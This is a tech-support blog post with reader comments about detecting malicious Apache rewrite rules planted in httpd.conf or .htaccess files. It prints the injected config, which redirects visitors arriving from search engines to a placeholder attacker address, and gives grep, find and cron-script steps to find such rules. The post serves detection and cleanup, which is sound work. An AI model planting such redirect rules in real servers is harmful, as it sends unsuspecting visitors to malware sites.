How can people hack my Apache server with Rewrite rules?A geeky friend of mine just told me that he's been seeing hackers slip a few lines of code into their Apache web server configuration and have all their traffic redirected to porn sites. Now I'm paranoid! How can I detect if this has happened to my own server? This happened to a pal of mine just a few days ago, actually, and at first we were convinced someone had hacked Google itself, because the symptoms were that when someone typed in his URL directly, they went to his site, but if they clicked on a search match on Google, they were redirected to a site that attempted to give you a virus. Digging around a bit, however, and chatting with various people on Twitter.com led us to suspect that there was something wonky with his server, not Google. I mean, in reality, it's pretty darn unlikely that someone's going to hack Google... Since the malicious redirect wasn't universally experienced, we knew that it couldn't be a DNS hijacking or similar (where your domain name is spontaneously assigned to the IP address of a porn site, etc). So it had to be something on the server itself. A bit of digging in the httpd.conf Apache web server configuration file revealed the offending code: RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://nefarious IP address/in.html?s=ipw2 [R,L] Errordocument 404 http://nefarious IP address/in.html?s=ipw2_err What this does is cause queries sent to the server with a referrer of Google, AOL, MSN, Altavista, Ask or Yahoo (e.g., the major search engines) have the query rewritten to be a redirect to the nefarious IP address URL. Definitely not good! But how to detect it? Well, one easy way is to just use the Unix/Linux command line tool "grep" to search and quickly view all rewrite rules in your configuration file, screening out those that don't also have "http:" in them. When I do that with my highly complex 2400-line server configuration, here's what I see: $ grep -i rewriterule /usr/local/apache/conf/httpd.conf | grep http:
RewriteRule ^/index.xml$ http://feeds.feedburner.com/AskDaveTaylor [R,L] RewriteRule ^/index.rdf$ http://feeds.feedburner.com/AskDaveTaylor [R,L] Those are both clean because it's how I let the popular Feedburner service catch my RSS feed URLs. Nothing suspicious like my friend had in his "httpd.conf" file. One more tweak and you could have a simple script that would email you if any of this bad code showed up if run from a cron job (Linux geeks know what I'm talking about): #!/bin/sh
conf=/usr/local/apache/conf/httpd.conf grep -i rewriterule $conf | grep http: | grep -v feedburner exit 0 Easy enough, right? Now it turns out that there's one more sneaky way that a hacker could slip this code onto your server: with a ".htaccess" file in the main directory or a subdirectory of your Web site itself, rather than in the central "httpd.conf" file. You can check for this from the command line again: $ cd /usr/local/apache/htdocs
find . -name ".htaccess" -print Before you panic on matches, realize that this is also how you most commonly password protect a directory on a Web server. In that instance, the file looks like this: AuthUserFile /etc/.htpasswd
AuthGroupFile /dev/null AuthName "Growing Your Biz w/ Google Course" AuthType Basic <Limit GET> require user taylor require user google require user steven </Limit> (You can learn more about password protecting Web site directories here: how to password protect a directory in Apache with .htaccess) Again, you can just look for the "http:" pattern, though this is a bit more complicated a command than last time: $ grep http: $(find . -name ".htaccess" -print)
$ Phew. I'm clean. You should check for this too. In fact, it might be a smart command to add to your simple admin script that I show above. Hope that helps you out! Many thanks to Greg Hughes for his help in isolating and sharing the dastardly code snippet shown above.
Help others find this article at Del.icio.us, Digg, Netscape, Reddit, and Stumble Upon
Categorized:
Blogs and RSS Feeds
(Article 8450)
Tagged: apache, hacking, http.conf, site hijacking Previous: What is eBay auction fever? Next: How can I wipe my old Apple iPhone clean of data? Subscribe!
Never miss another useful Q&A article again! Subscribe to AskDaveTaylor with Google Reader. Hi Dave, Great article - thanks. I agree with Paris; how are black hats getting into httpd.conf files or .htaccess files in the first place? SSH root access? Oh, and I also agree: it is otherwise a good article. Thanks. Posted by: Dave Cole at August 21, 2008 8:32 AMI add to the thanks for writing this. I also ask for the same additional info on how this can be stopped in the first place. I understand from some sites that poorly written PHP code can lead a person to discover the file structure, but if the sites are secure, how are they able to do anything with that info? What can we do to stop them from using bad code on a user's site against us the whole server? Posted by: Greg at November 18, 2008 1:37 PMCAn anybody tell me why I can no longer get to www.youtube.com? Instead I get UK.youtube.com, and also many other google searches where the search gives normal websites, homepages, etc. as answers, when I click on them in Google search, I'm instead sent to some "parked" looking spammy type web pages. Is this my Google/local computer with a malware problem or is it the websites? I can't believe youtube (usa) has this problem but I sure can't reach it. Something to do with Hosts file? Don't know what that is... please feel free to email me or respond here. Thanks Dardar Posted by: Dardar at December 17, 2008 2:49 PMThanks for posting this! I was scratching my head wondering how Google could be hacked and why only for my site. This information was a lifesaver! Posted by: Johann at January 29, 2009 4:58 PMI've been dealing a lot with this type of hack. Now it seems that the directory permissions are being changed to 777 when the htaccess file is uploaded. It seems they are uploading a file called m.php: This file renames a blank file called htt to .htaccess. Posted by: help at February 11, 2009 4:24 PMThis is a nice explanation - many thanks! But like a few others who said the same thing, I'm wondering HOW someone could actually place a file when they don't have a valid password... Thank you for your time! Posted by: Khalid at January 6, 2010 11:58 PMI have something to say, now that you mention it, but ...
I do have a comment, now that you mention it!
|
  
Search
Find just the answers you seek from among our 2300+ free tech support articles by using our Lijit search engine.
Help!
Subscribe to
Ask Dave Taylor! 
Free Updates!
Sign up and get free weekly updates and special offers on books, seminars, workshops and more.
Articles and Reviews
Auctions and Online Shopping Blogs and RSS Feeds Building Web site traffic Business and Management Cell Phones and Mobile Phones CGI Scripts and Web Site Programming Computer and Internet Basics d) None of the Above HTML and CSS Industry News and Trade Shows Mac OS X Help MySpace, Facebook, Twitter and Social Network Help Pay Per Click (PPC) Search Engine Optimization Shell Script Programming Sony PSP, MP3 Players, Etc. The Writing Business Unix and Linux Help Video Game Tips and Help Windows Help
Recent Entries
Book Links
|
Note: This web site is for the purpose of disseminating information for educational purposes, free of charge, for the benefit of all visitors. We take great care to provide quality information. However, we do not guarantee, and accept no legal liability whatsoever arising from or connected to, the accuracy, reliability, currency or completeness of any material contained on this web site or on any linked site.
![[whiteboard marker tray]](/Graphics/marker-tray.gif){kind=small}
